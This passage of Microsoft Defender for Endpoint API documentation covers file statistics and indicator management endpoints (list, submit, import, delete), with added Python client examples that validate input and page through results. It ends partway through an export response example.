The response includes only devices that the user has access to, based on device group settings (for more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/files/{id}/machines

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and file exists - 200 OK with list of machine entities in the body. If file
doesn't exist - 200 OK with an empty set.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/files/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/machines


Get file statistics API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the statistics for the given file.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
2. The maximum value for lookBackHours is 720 hours (30 days).

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | File.Read.All | 'Read file profiles'
Delegated (work or school account) | File.Read.All | 'Read file profiles'

Note

When obtaining a token using user credentials, the user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).

HTTP request
HTTP

GET /api/files/{id}/stats

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request URI parameters

Name | Type | Description
lookBackHours | Int32 | Defines the hours we search back to get the statistics. Defaults to 30 days. Optional.

Request body
Empty

Response
If successful and file exists - 200 OK with statistical data in the body. If file does not exist
- 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/files/0991a395da64e1c5fbe8732ed11e6be064081d9f/stats?lookBackHours=48

Response example
Here's an example of the response.

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgFileStats",
  "sha1": "0991a395da64e1c5fbe8732ed11e6be064081d9f",
  "organizationPrevalence": 14850,
  "orgFirstSeen": "2019-12-07T13:44:16Z",
  "orgLastSeen": "2020-01-06T13:39:36Z",
  "globallyPrevalence": 705012,
  "globalFirstObserved": "2015-03-19T12:20:07.3432441Z",
  "globalLastObserved": "2020-01-06T13:39:36Z",
  "topFileNames": [
    "MREC.exe"
  ]
}
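
The four file APIs above (Get file information, Get file-related alerts, Get file-related machines, Get file statistics) share the same input rules, so here is one added client example that enforces them; it is not code from the Defender for Endpoint documentation. The HTTP transport is injected so it runs offline, and three things are assumptions: that collection responses wrap entities in `value` (as the indicator list example does), the `FileApi` and `triage_file` names, and the prevalence threshold used in `triage_file`.

```python
import re
from typing import Any, Callable, Dict, List, Optional, Tuple

# Global host; pass a regional host from the Tip (api-eu..., api-us..., ...) instead if closer.
DEFAULT_HOST = "api.securitycenter.microsoft.com"
MAX_LOOKBACK_HOURS = 720  # documented ceiling for lookBackHours (30 days)
_SHA1 = re.compile(r"^[0-9a-f]{40}$", re.IGNORECASE)
_SHA256 = re.compile(r"^[0-9a-f]{64}$", re.IGNORECASE)

# Injected transport so the example runs offline: fetch(url, headers) -> (status, decoded JSON or None).
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, Any]]


class FileApiError(RuntimeError):
    """Raised for any HTTP status the articles do not define for the call."""


class FileApi:
    """GET /api/files/{id}, /alerts, /machines and /stats with the documented input rules."""

    def __init__(self, token: str, fetch: Fetcher, host: str = DEFAULT_HOST) -> None:
        self._headers = {"Authorization": f"Bearer {token}"}  # the only required header
        self._fetch = fetch
        self._base = f"https://{host}/api/files/"

    @staticmethod
    def _sha1(file_hash: str) -> str:
        # /alerts, /machines and /stats accept SHA-1 only (not MD5 or SHA-256).
        if not _SHA1.match(file_hash):
            raise ValueError("this endpoint requires a SHA-1 hash")
        return file_hash.lower()

    @staticmethod
    def _sha1_or_sha256(file_hash: str) -> str:
        # GET /api/files/{id} accepts SHA-1 or SHA-256; anything else is refused locally.
        if not (_SHA1.match(file_hash) or _SHA256.match(file_hash)):
            raise ValueError("file lookup requires a SHA-1 or SHA-256 hash")
        return file_hash.lower()

    def _get(self, path: str) -> Tuple[int, Any]:
        return self._fetch(self._base + path, self._headers)

    def get_file(self, file_hash: str) -> Optional[Dict[str, Any]]:
        """The file entity, or None on 404 (the hash has never been observed)."""
        status, body = self._get(self._sha1_or_sha256(file_hash))
        if status == 200:
            return body
        if status == 404:
            return None
        raise FileApiError(f"GET file: HTTP {status}")

    def _collection(self, file_hash: str, sub: str) -> List[Dict[str, Any]]:
        # An unknown file answers 200 OK with an empty set, so an empty list is not an error.
        # Assumed: collection responses wrap entities in "value", as in the indicator list example.
        status, body = self._get(f"{self._sha1(file_hash)}/{sub}")
        if status != 200:
            raise FileApiError(f"GET {sub}: HTTP {status}")
        return list(body.get("value", []))

    def related_alerts(self, file_hash: str) -> List[Dict[str, Any]]:
        return self._collection(file_hash, "alerts")

    def related_machines(self, file_hash: str) -> List[Dict[str, Any]]:
        return self._collection(file_hash, "machines")

    def stats(self, file_hash: str,
              look_back_hours: Optional[int] = None) -> Optional[Dict[str, Any]]:
        """Org and global prevalence; look_back_hours is clamped to the 720-hour ceiling."""
        path = f"{self._sha1(file_hash)}/stats"
        if look_back_hours is not None:
            path += f"?lookBackHours={max(1, min(int(look_back_hours), MAX_LOOKBACK_HOURS))}"
        status, body = self._get(path)
        if status == 200:
            return body
        if status == 404:
            return None
        raise FileApiError(f"GET stats: HTTP {status}")


def triage_file(entity: Dict[str, Any]) -> List[str]:
    """Findings an analyst wants first from a file entity; the rarity cutoff is an assumed value."""
    findings: List[str] = []
    if entity.get("isPeFile") and not entity.get("isValidCertificate"):
        findings.append("pe-signature-not-verified")  # PE whose signature the agent could not verify
    if entity.get("determinationType"):
        findings.append(f"determination:{entity['determinationType']}")  # e.g. Pua
    if (entity.get("globalPrevalence") or 0) < 50:  # assumed threshold, not from the article
        findings.append("rare-globally")
    return findings
```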


Indicator resource type
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

See the corresponding Indicators page in the portal.

Methods

Method | Return type | Description
List Indicators | Indicator Collection | List Indicator entities.
Submit Indicator | Indicator | Submit or update Indicator entity.
Import Indicators | Indicator Collection | Submit or update Indicators entities.
Delete Indicator | No Content | Deletes Indicator entity.

Properties

Property | Type | Description
id | String | Identity of the Indicator entity.
indicatorValue | String | The value of the Indicator.
indicatorType | Enum | Type of the indicator. Possible values are: FileSha1, FileSha256, FileMd5, CertificateThumbprint, IpAddress, DomainName, and Url.
application | String | The application associated with the indicator.
action | Enum | The action that is taken if the indicator is discovered in the organization. Possible values are: Warn, Block, Audit, Alert, AlertAndBlock, BlockAndRemediate, and Allowed.
externalID | String | Id the customer can submit in the request for custom correlation.
sourceType | Enum | User in case the Indicator was created by a user (for example, from the portal), AadApp in case it was submitted by an automated application via the API.
createdBySource | String | The name of the user/application that submitted the indicator.
createdBy | String | Unique identity of the user/application that submitted the indicator.
lastUpdatedBy | String | Identity of the user/application that last updated the indicator.
creationTimeDateTimeUtc | DateTimeOffset | The date and time when the indicator was created.
expirationTime | DateTimeOffset | The expiration time of the indicator.
lastUpdateTime | DateTimeOffset | The last time the indicator was updated.
severity | Enum | The severity of the indicator. Possible values are: Informational, Low, Medium, and High.
title | String | Indicator title.
description | String | Description of the indicator.
recommendedActions | String | Recommended actions for the indicator.
rbacGroupNames | List of strings | RBAC device group names where the indicator is exposed and active. Empty list in case it is exposed to all devices.
rbacGroupIds | List of strings | RBAC device group IDs where the indicator is exposed and active. Empty list in case it is exposed to all devices.
generateAlert | Enum | True if alert generation is required, False if this indicator shouldn't generate an alert.

Indicator Types
The indicator action types supported by the API are:

Allowed
Audit
Block
BlockAndRemediate
Warn (Defender for Cloud Apps only)

For more information on the description of the response action types, see Create
indicators.

Note

The prior response actions (AlertAndBlock and Alert) will be supported until January 2022. After this date, all customers must use one of the action types listed in this section.

Json representation
JSON

{
  "id": "994",
  "indicatorValue": "881c0f10c75e64ec39d257a131fcd531f47dd2cff2070ae94baa347d375126fd",
  "indicatorType": "FileSha256",
  "action": "AlertAndBlock",
  "application": null,
  "source": "user@contoso.onmicrosoft.com",
  "sourceType": "User",
  "createdBy": "user@contoso.onmicrosoft.com",
  "severity": "Informational",
  "title": "Michael test",
  "description": "test",
  "recommendedActions": "nothing",
  "creationTimeDateTimeUtc": "2019-12-19T09:09:46.9139216Z",
  "expirationTime": null,
  "lastUpdateTime": "2019-12-19T09:09:47.3358111Z",
  "lastUpdatedBy": null,
  "rbacGroupNames": ["team1"]
}

See also
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus


List Indicators API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of all active Indicators.

Supports OData V4 queries.

The OData $filter query is supported on the application, createdByDisplayName, expirationTime, generateAlert, title, rbacGroupNames, rbacGroupIds, indicatorValue, indicatorType, creationTimeDateTimeUtc, createdBy, action, and severity properties.

$top with a maximum value of 10,000.

$skip.

See examples at OData queries with Microsoft Defender for Endpoint.


Limitations
Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Ti.ReadWrite | Read and write Indicators
Application | Ti.ReadWrite.All | Read and write All Indicators
Delegated (work or school account) | Ti.ReadWrite | Read and write Indicators

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/indicators

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with a collection of Indicator entities.

Note

If the Application has the Ti.ReadWrite.All permission, it is exposed to all Indicators. Otherwise, it is exposed only to the Indicators it created.

Example 1

Example 1 request
Here's an example of a request that gets all indicators.

HTTP

GET https://api.securitycenter.microsoft.com/api/indicators

Example 1 response
Here's an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Indicators",
  "value": [
    {
      "id": "995",
      "indicatorValue": "12.13.14.15",
      "indicatorType": "IpAddress",
      "action": "Alert",
      "application": "demo-test",
      "source": "TestPrdApp",
      "sourceType": "AadApp",
      "title": "test",
      "creationTimeDateTimeUtc": "2018-10-24T11:15:35.3688259Z",
      "createdBy": "45097602-1234-5678-1234-9f453233e62c",
      "expirationTime": "2020-12-12T00:00:00Z",
      "lastUpdateTime": "2019-10-24T10:54:23.2009016Z",
      "lastUpdatedBy": "TestPrdApp",
      "severity": "Informational",
      "description": "test",
      "recommendedActions": "test",
      "rbacGroupNames": []
    },
    {
      "id": "996",
      "indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
      "indicatorType": "FileSha1",
      "action": "AlertAndBlock",
      "application": null,
      "source": "TestPrdApp",
      "sourceType": "AadApp",
      "title": "test",
      "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
      "createdBy": "45097602-1234-5678-1234-9f453233e62c",
      "expirationTime": "2020-12-12T00:00:00Z",
      "lastUpdateTime": "2019-10-24T10:54:23.2009016Z",
      "lastUpdatedBy": "TestPrdApp",
      "severity": "Informational",
      "description": "test",
      "recommendedActions": "TEST",
      "rbacGroupNames": [ "Group1", "Group2" ]
    }
    ...
  ]
}

Example 2

Example 2 request
Here's an example of a request that gets all Indicators with AlertAndBlock action.

HTTP

GET https://api.securitycenter.microsoft.com/api/indicators?$filter=action+eq+'AlertAndBlock'

Example 2 response
Here's an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Indicators",
  "value": [
    {
      "id": "997",
      "indicatorValue": "111e7d15b0b3d7fac48f2bd61114db1022197f7f",
      "indicatorType": "FileSha1",
      "action": "AlertAndBlock",
      "application": null,
      "source": "TestPrdApp",
      "sourceType": "AadApp",
      "title": "test",
      "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
      "createdBy": "45097602-1234-5678-1234-9f453233e62c",
      "expirationTime": "2020-12-12T00:00:00Z",
      "lastUpdateTime": "2019-10-24T10:54:23.2009016Z",
      "lastUpdatedBy": "TestPrdApp",
      "severity": "Informational",
      "description": "test",
      "recommendedActions": "TEST",
      "rbacGroupNames": [ "Group1", "Group2" ]
    }
    ...
  ]
}
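
An added example (not code from the Defender for Endpoint documentation) of walking the indicator collection with the OData options this article lists: a `$filter` builder restricted to the filterable properties, `$top`/`$skip` paging under the 10,000 ceiling, and a pass that picks out indicators still carrying a retired action. The transport is injected so it runs offline; the function names are assumptions.

```python
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple
from urllib.parse import urlencode

INDICATORS_URL = "https://api.securitycenter.microsoft.com/api/indicators"
MAX_TOP = 10_000  # documented ceiling for $top
# Properties the article lists as supported by $filter.
FILTERABLE = {
    "application", "createdByDisplayName", "expirationTime", "generateAlert", "title",
    "rbacGroupNames", "rbacGroupIds", "indicatorValue", "indicatorType",
    "creationTimeDateTimeUtc", "createdBy", "action", "severity",
}
# Response actions still supported per the Indicator resource article; Alert and
# AlertAndBlock are the retired values that older indicators may still carry.
SUPPORTED_ACTIONS = {"Allowed", "Audit", "Block", "BlockAndRemediate", "Warn"}

# Injected transport so the example runs offline: fetch(url, headers) -> (status, JSON).
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, Any]]


def odata_eq_filter(**conditions: str) -> str:
    """Build an OData $filter of `prop eq 'value'` terms joined with `and`."""
    terms = []
    for prop, value in conditions.items():
        if prop not in FILTERABLE:
            raise ValueError(f"{prop} cannot be used in $filter for indicators")
        escaped = value.replace("'", "''")  # OData string literals escape ' as ''
        terms.append(f"{prop} eq '{escaped}'")
    return " and ".join(terms)


def list_indicators(token: str, fetch: Fetcher, filter_expr: Optional[str] = None,
                    page_size: int = 1000) -> Iterator[Dict[str, Any]]:
    """Yield every indicator visible to the caller, paging with $top/$skip."""
    headers = {"Authorization": f"Bearer {token}"}
    top = max(1, min(page_size, MAX_TOP))
    skip = 0
    while True:
        params: Dict[str, Any] = {}
        if filter_expr:
            params["$filter"] = filter_expr
        params["$top"], params["$skip"] = top, skip
        # safe="$'" leaves the query readable, matching the article's example URL.
        url = f"{INDICATORS_URL}?{urlencode(params, safe=chr(36) + chr(39))}"
        status, body = fetch(url, headers)
        if status != 200:
            raise RuntimeError(f"list indicators: HTTP {status}")
        page = body.get("value", [])
        yield from page
        if len(page) < top:  # a short page is the last page
            return
        skip += top


def retired_action_indicators(indicators) -> List[Dict[str, Any]]:
    """Indicators still using a retired action, i.e. candidates for migration."""
    return [i for i in indicators if i.get("action") not in SUPPORTED_ACTIONS]
```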


Submit or Update Indicator API
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Submits or updates a new Indicator entity.

CIDR notation for IPs isn't supported.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
2. There's a limit of 15,000 active indicators per tenant.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Ti.ReadWrite | Read and write Indicators
Application | Ti.ReadWrite.All | Read and write All Indicators
Delegated (work or school account) | Ti.ReadWrite | Read and write Indicators

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/indicators

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
indicatorValue | String | Identity of the Indicator entity. Required
indicatorType | Enum | Type of the indicator. Possible values are: FileSha1, FileMd5, CertificateThumbprint, FileSha256, IpAddress, DomainName, and Url. Required
action | Enum | The action that is taken if the indicator is discovered in the organization. Possible values are: Alert, Warn, Block, Audit, BlockAndRemediate, AlertAndBlock, and Allowed. Required. The GenerateAlert parameter must be set to TRUE when creating an action with Audit.
application | String | The application associated with the indicator. This field only works for new indicators. It doesn't update the value on an existing indicator. Optional
title | String | Indicator alert title. Required
description | String | Description of the indicator. Required
expirationTime | DateTimeOffset | The expiration time of the indicator. Optional
severity | Enum | The severity of the indicator. Possible values are: Informational, Low, Medium, and High. Optional
recommendedActions | String | TI indicator alert recommended actions. Optional
rbacGroupNames | String | Comma-separated list of RBAC group names the indicator would be applied to. Optional
educateUrl | String | Custom notification/support URL. Supported for Block and Warn action types for URL indicators. Optional
generateAlert | Enum | True if alert generation is required, False if this indicator shouldn't generate an alert.

Response
If successful, this method returns a 200 - OK response code and the created or updated Indicator entity in the response body.
If not successful, this method returns 400 - Bad Request. A bad request usually indicates an incorrect body.

Example

Request
Here's an example of the request.

HTTP
POST https://api.securitycenter.microsoft.com/api/indicators

JSON

{
"indicatorValue": "220e7d15b011d7fac48f2bd61114db1022197f7f",
"indicatorType": "FileSha1",
"title": "test",
"application": "demo-test",
"expirationTime": "2020-12-12T00:00:00Z",
"action": "AlertAndBlock",
"severity": "Informational",
"description": "test",
"recommendedActions": "nothing",
"rbacGroupNames": ["group1", "group2"]
}

Related article
Manage indicators


Import Indicators API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Submits or updates a batch of Indicator entities.

CIDR notation for IPs isn't supported.

Limitations
1. Rate limitations for this API are 30 calls per minute.
2. There's a limit of 15,000 active Indicators per tenant.
3. Maximum batch size for one API call is 500.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Ti.ReadWrite | Read and write Indicators
Application | Ti.ReadWrite.All | Read and write All Indicators
Delegated (work or school account) | Ti.ReadWrite | Read and write Indicators

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/indicators/import

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
Indicators | List<Indicator> | List of Indicators. Required

Response
If successful, this method returns a 200 - OK response code with a list of import results per indicator; see the following example.
If not successful, this method returns 400 - Bad Request. A bad request usually indicates an incorrect body.

Example

Request example
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/indicators/import

JSON

{
  "Indicators": [
    {
      "indicatorValue": "220e7d15b011d7fac48f2bd61114db1022197f7f",
      "indicatorType": "FileSha1",
      "title": "demo",
      "application": "demo-test",
      "expirationTime": "2021-12-12T00:00:00Z",
      "action": "Alert",
      "severity": "Informational",
      "description": "demo2",
      "recommendedActions": "nothing",
      "rbacGroupNames": ["group1", "group2"]
    },
    {
      "indicatorValue": "2233223322332233223322332233223322332233223322332233223322332222",
      "indicatorType": "FileSha256",
      "title": "demo2",
      "application": "demo-test2",
      "expirationTime": "2021-12-12T00:00:00Z",
      "action": "Alert",
      "severity": "Medium",
      "description": "demo2",
      "recommendedActions": "nothing",
      "rbacGroupNames": []
    }
  ]
}

Response example
Here's an example of the response.

JSON

{
  "value": [
    {
      "id": "2841",
      "indicator": "220e7d15b011d7fac48f2bd61114db1022197f7f",
      "isFailed": false,
      "failureReason": null
    },
    {
      "id": "2842",
      "indicator": "2233223322332233223322332233223322332233223322332233223322332222",
      "isFailed": false,
      "failureReason": null
    }
  ]
}
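
An added example (not code from the Defender for Endpoint documentation) that applies the rules from the Submit and Import articles before anything is sent: required fields, value format per indicatorType, no CIDR for IpAddress, only the supported (non-retired) actions, generateAlert required with Audit, the 15,000 active-indicator limit, and batches of at most 500 per import call, with the per-indicator `isFailed` results merged afterwards. The transport is injected so it runs offline; the function names are assumptions.

```python
import ipaddress
import re
from typing import Any, Callable, Dict, List, Tuple

IMPORT_URL = "https://api.securitycenter.microsoft.com/api/indicators/import"
MAX_BATCH = 500       # documented maximum batch size per import call
MAX_ACTIVE = 15_000   # documented limit of active indicators per tenant
# Actions listed as supported in the Indicator resource article; Alert/AlertAndBlock are retired.
SUPPORTED_ACTIONS = {"Allowed", "Audit", "Block", "BlockAndRemediate", "Warn"}
HEX_LENGTHS = {"FileSha1": 40, "FileSha256": 64, "FileMd5": 32, "CertificateThumbprint": 40}
REQUIRED = ("indicatorValue", "indicatorType", "action", "title", "description")

# Injected transport so the example runs offline: post(url, headers, json_body) -> (status, JSON).
Poster = Callable[[str, Dict[str, str], Dict[str, Any]], Tuple[int, Any]]


def validate_indicator(ind: Dict[str, Any]) -> List[str]:
    """Return the reasons the service would reject this body (empty list means it looks valid)."""
    problems = [f"missing {f}" for f in REQUIRED if not ind.get(f)]
    itype, value = ind.get("indicatorType"), str(ind.get("indicatorValue", ""))
    if itype in HEX_LENGTHS:
        if not re.fullmatch(r"[0-9a-fA-F]{%d}" % HEX_LENGTHS[itype], value):
            problems.append(f"{itype} value must be {HEX_LENGTHS[itype]} hex characters")
    elif itype == "IpAddress":
        if "/" in value:
            problems.append("CIDR notation for IPs isn't supported")
        else:
            try:
                ipaddress.ip_address(value)
            except ValueError:
                problems.append("indicatorValue is not an IP address")
    elif itype not in ("DomainName", "Url", None):
        problems.append(f"unknown indicatorType {itype}")
    action = ind.get("action")
    if action and action not in SUPPORTED_ACTIONS:
        problems.append(f"action {action} is retired or unknown")
    if action == "Audit" and ind.get("generateAlert") is not True:
        problems.append("Audit requires generateAlert to be true")
    return problems


def import_indicators(token: str, post: Poster, indicators: List[Dict[str, Any]],
                      active_count: int = 0) -> Dict[str, Any]:
    """Validate locally, submit in batches of 500, and merge the per-indicator results."""
    rejected = {}
    for ind in indicators:
        problems = validate_indicator(ind)
        if problems:
            rejected[ind.get("indicatorValue")] = problems
    if rejected:
        raise ValueError(f"invalid indicators: {rejected}")
    if active_count + len(indicators) > MAX_ACTIVE:
        raise ValueError("import would exceed the 15,000 active indicators per tenant")
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    results: List[Dict[str, Any]] = []
    for start in range(0, len(indicators), MAX_BATCH):
        batch = indicators[start:start + MAX_BATCH]
        status, body = post(IMPORT_URL, headers, {"Indicators": batch})
        if status != 200:  # 400 usually means a malformed body
            raise RuntimeError(f"import: HTTP {status} on batch starting at {start}")
        results.extend(body.get("value", []))
    failed = [r for r in results if r.get("isFailed")]
    return {"submitted": len(results), "failed": failed}
```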

Related article
Manage indicators


Delete Indicator API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Deletes an Indicator entity by ID.

Limitations
Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Ti.ReadWrite | 'Read and write TI Indicators'
Application | Ti.ReadWrite.All | 'Read and write Indicators'

HTTP request
HTTP

DELETE https://api.securitycenter.microsoft.com/api/indicators/{id}


Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If Indicator exists and deleted successfully - 204 OK without content.

If Indicator with the specified ID wasn't found - 404 Not Found.


Example

Request
Here's an example of the request.

HTTP

DELETE https://api.securitycenter.microsoft.com/api/indicators/995


Batch Delete Indicators
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Deletes Indicator entities by ID.

Limitations
Rate limitations for this API are 30 calls per minute and 1,500 calls per hour.

Batch size limit of up to 500 Indicator IDs.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Ti.ReadWrite | 'Read and write TI Indicators'
Application | Ti.ReadWrite.All | 'Read and write Indicators'

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/indicators/BatchDelete

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
IndicatorIds | List<String> | A list of the IDs of the indicators to be removed. Required

Response
If Indicators all existed and were deleted successfully - 204 OK without content.

If indicator IDs list is empty or exceeds size limit - 400 Bad Request.

If any indicator ID is invalid - 400 Bad Request.

If requestor isn't exposed to any indicator's device groups - 403 Forbidden.

If any Indicator ID wasn't found - 404 Not Found.

Example

Request
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/indicators/BatchDelete

JSON

{
"IndicatorIds": [ "1", "2", "5" ]
}


Information gathering assessment per
device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.
Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

This API response returns all information gathering assessments for all devices, on a per-device basis. It returns a table with a separate entry for every DeviceId.

It pulls all relevant data in your organization as a download file. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:

Call the API to get a list of download URLs with all your organization data.
Download all the files using the download URLs and process the data as you like.

Data that is collected (via files) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storage.

7 Note

Unless indicated otherwise, all export assessment methods listed are full export
and by device (also referred to as per device).

1. Export information gathering assessment (via files)
1.1 API method description
Returns all information gathering assessments for all devices, on a per-device basis. It
returns a table with a separate entry for every DeviceId.

Limitations

Rate limitations for this API are 5 calls per minute and 20 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'

1.3 URL
HTTP

GET /api/Machines/InfoGatheringExport

1.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (maximum 24 hours).

1.5 Properties

7 Note

The files are gzip compressed and in multiline JSON format.

The download URLs are only valid for 3 hours by default; to change that, use the
sasValidHours parameter.

To maximize download speeds, make sure you are downloading the data from the
same Azure region where your data resides.

Some additional columns might be returned in the response. These columns are
temporary and might be removed. Only use the documented columns.

Property (ID) | Data type | Description
Export files | String[array] | A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime | DateTime | The time the export was generated.

1.6 Examples

1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/InfoGatheringExport?$sasValidHours=1

1.6.2 Response example

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
    "exportFiles": [
        "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=0/part-00001-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=9GVFFNbgkLc69u32nO944SosmcTUj0usPJqkJwx5iow%3D",
